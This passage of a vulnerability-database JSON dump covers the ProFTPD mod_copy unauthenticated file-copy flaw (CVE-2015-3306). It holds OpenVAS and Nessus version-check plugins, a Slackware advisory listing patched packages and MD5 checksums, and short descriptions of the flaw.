script_mandatory_keys(\"ProFTPD/Installed\");\n\n script_tag(name:\"summary\", value:\"An arbitrary file copy vulnerability in mod_copy in ProFTPD allows for remote\n code execution and information disclosure without authentication, a related issue to CVE-2015-3306.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"ProFTPD version 1.3.6 and prior.\");\n\n script_tag(name:\"solution\", value:\"As a workaround disable mod_copy in the ProFTPd configuration file.\");\n\n script_xref(name:\"URL\", value:\"https://tbspace.de/cve201912815proftpd.html\");\n script_xref(name:\"URL\", value:\"http://bugs.proftpd.org/show_bug.cgi?id=4372\");\n script_xref(name:\"URL\", value:\"https://www.bleepingcomputer.com/news/security/proftpd-vulnerability-lets-users-copy-files-without-permission/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (isnull(port = get_app_port(cpe: CPE)))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"1.3.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"None\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-05-04T00:00:00", "type": "openvas", "title": "Fedora Update for proftpd FEDORA-2015-6401", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4359", "CVE-2015-3306"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869338", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869338", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for proftpd FEDORA-2015-6401\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869338\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-04 05:45:44 +0200 (Mon, 04 May 2015)\");\n script_cve_id(\"CVE-2015-3306\", \"CVE-2013-4359\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for proftpd FEDORA-2015-6401\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'proftpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"proftpd on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-6401\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"proftpd\", rpm:\"proftpd~1.3.4e~3.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[slackware-security] proftpd (SSA:2015-111-12)\r\n\r\nNew proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\r\nand -current to fix a security issue.\r\n\r\n\r\nHere are the details from the Slackware 14.1 ChangeLog:\r\n+--------------------------+\r\npatches/packages/proftpd-1.3.4e-i486-1_slack14.1.txz: Upgraded.\r\n Patched an issue where mod_copy allowed unauthenticated copying\r\n of files via SITE CPFR/CPTO.\r\n For more information, see:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306\r\n (* Security fix *)\r\n+--------------------------+\r\n\r\n\r\nWhere to find the new packages:\r\n+-----------------------------+\r\n\r\nThanks to the friendly folks at the OSU Open Source Lab\r\n(http://osuosl.org) for donating FTP and rsync hosting\r\nto the Slackware project! \r\n\r\nAlso see the "Get Slack" section on http://slackware.com for\r\nadditional mirror sites near you.\r\n\r\nUpdated package for Slackware 13.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/proftpd-1.3.4e-i486-1_slack13.0.txz\r\n\r\nUpdated package for Slackware x86_64 13.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.0.txz\r\n\r\nUpdated package for Slackware 13.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/proftpd-1.3.4e-i486-1_slack13.1.txz\r\n\r\nUpdated package for Slackware x86_64 13.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.1.txz\r\n\r\nUpdated package for Slackware 13.37:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/proftpd-1.3.4e-i486-1_slack13.37.txz\r\n\r\nUpdated package for Slackware x86_64 13.37:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.37.txz\r\n\r\nUpdated package for Slackware 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/proftpd-1.3.4e-i486-1_slack14.0.txz\r\n\r\nUpdated package for Slackware x86_64 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/proftpd-1.3.4e-x86_64-1_slack14.0.txz\r\n\r\nUpdated package for Slackware 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/proftpd-1.3.4e-i486-1_slack14.1.txz\r\n\r\nUpdated package for Slackware x86_64 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/proftpd-1.3.4e-x86_64-1_slack14.1.txz\r\n\r\nUpdated package for Slackware -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/proftpd-1.3.5-i486-1.txz\r\n\r\nUpdated package for Slackware x86_64 -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/proftpd-1.3.5-x86_64-1.txz\r\n\r\n\r\nMD5 signatures:\r\n+-------------+\r\n\r\nSlackware 13.0 package:\r\n2a8e151c0a89cd4c762f91d0ebdb42ad proftpd-1.3.4e-i486-1_slack13.0.txz\r\n\r\nSlackware x86_64 13.0 package:\r\n8527f88708637716574865e4236c9735 proftpd-1.3.4e-x86_64-1_slack13.0.txz\r\n\r\nSlackware 13.1 package:\r\n8b4fc4806eac629458d4b896576b81c3 proftpd-1.3.4e-i486-1_slack13.1.txz\r\n\r\nSlackware x86_64 13.1 package:\r\n91ba22a276abb6f5c71b9fb6c1189f16 proftpd-1.3.4e-x86_64-1_slack13.1.txz\r\n\r\nSlackware 13.37 package:\r\n1cafe01a6781e838e3f4b4e760ecd8a8 proftpd-1.3.4e-i486-1_slack13.37.txz\r\n\r\nSlackware x86_64 13.37 package:\r\n5f0c02a30013e417306415cf581e6f84 proftpd-1.3.4e-x86_64-1_slack13.37.txz\r\n\r\nSlackware 14.0 package:\r\nd7ce0c331867f3729b3f19109f0c3719 proftpd-1.3.4e-i486-1_slack14.0.txz\r\n\r\nSlackware x86_64 14.0 package:\r\n2e3d9b3bc4ee47673fd8d584641d8749 proftpd-1.3.4e-x86_64-1_slack14.0.txz\r\n\r\nSlackware 14.1 package:\r\n0988db123b29a86ef9701cabb963c92a proftpd-1.3.4e-i486-1_slack14.1.txz\r\n\r\nSlackware x86_64 14.1 package:\r\n0354803c7ef6d0e1f62ea248e99fc4e5 proftpd-1.3.4e-x86_64-1_slack14.1.txz\r\n\r\nSlackware -current package:\r\n81735dd24713102370b25cde0433b701 n/proftpd-1.3.5-i486-1.txz\r\n\r\nSlackware x86_64 -current package:\r\n75298849d3cfd9a1ddae18bbf298dd6f n/proftpd-1.3.5-x86_64-1.txz\r\n\r\n\r\nInstallation instructions:\r\n+------------------------+\r\n\r\nUpgrade the package as root:\r\n# upgradepkg proftpd-1.3.4e-i486-1_slack14.1.txz\r\n\r\n\r\n+-----+\r\n\r\nSlackware Linux Security Team\r\nhttp://slackware.com/gpg-key\r\nsecurity@slackware.com\r\n\r\n+------------------------------------------------------------------------+\r\n| To leave the slackware-security mailing list: |\r\n+------------------------------------------------------------------------+\r\n| Send an email to majordomo@slackware.com with this text in the body of |\r\n| the email message: |\r\n| |\r\n| unsubscribe slackware-security |\r\n| |\r\n| You will get a confirmation message back containing instructions to |\r\n| complete the process. Please do not reply to this email address. |\r\n+------------------------------------------------------------------------+\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niEYEARECAAYFAlU2zZYACgkQakRjwEAQIjMb/QCeORDbcU2ZWwaQN9LFatgaCtom\r\nV7YAoJV8VmbN9g5FVTlGSGQxcEamiP5W\r\n=n5sz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-05-05T00:00:00", "title": "[slackware-security] proftpd (SSA:2015-111-12)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:32007", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32007", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:10:17", "description": "Unauthorized files copy via mod_copy.", "edition": 2, "cvss3": {}, "published": "2015-05-05T00:00:00", "title": "ProFTPD unauthorized files access", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-05T00:00:00", "id": "SECURITYVULNS:VULN:14450", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14450", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2022-06-16T14:47:05", "description": "ProFTPd development team reports :\n\nVadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by *unauthenticated clients*.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-21T00:00:00", "type": "nessus", "title": "FreeBSD : proftpd -- arbitrary code execution vulnerability with chroot (d0034536-ff24-11e4-a072-d050996490d0)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:proftpd", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D0034536FF2411E4A072D050996490D0.NASL", "href": "https://www.tenable.com/plugins/nessus/83752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83752);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-3306\");\n\n script_name(english:\"FreeBSD : proftpd -- arbitrary code execution vulnerability with chroot (d0034536-ff24-11e4-a072-d050996490d0)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ProFTPd development team reports :\n\nVadim Melihow reported a critical issue with proftpd installations\nthat use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy\nallows these commands to be used by *unauthenticated clients*.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\"\n );\n # https://vuxml.freebsd.org/freebsd/d0034536-ff24-11e4-a072-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a3da31e8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"proftpd<1.3.5_7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:44:22", "description": "New proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-22T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : proftpd (SSA:2015-111-12)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:proftpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-111-12.NASL", "href": "https://www.tenable.com/plugins/nessus/82925", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-111-12. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82925);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_xref(name:\"SSA\", value:\"2015-111-12\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : proftpd (SSA:2015-111-12)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New proftpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.503863\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?26b1069e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"proftpd\", pkgver:\"1.3.5\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.5\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:47:05", "description": "Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by unauthenticated clients\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nNote that mod_copy is not loaded/enabled by default in the Fedora package.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-11T00:00:00", "type": "nessus", "title": "Fedora 21 : proftpd-1.3.5-5.fc21 (2015-7086)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:proftpd", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-7086.NASL", "href": "https://www.tenable.com/plugins/nessus/83323", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7086.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83323);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_xref(name:\"FEDORA\", value:\"2015-7086\");\n\n script_name(english:\"Fedora 21 : proftpd-1.3.5-5.fc21 (2015-7086)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vadim Melihow reported a critical issue with proftpd installations\nthat use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy\nallows these commands to be used by unauthenticated clients\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nNote that mod_copy is not loaded/enabled by default in the Fedora\npackage.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212386\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157581.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?86aa97d0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 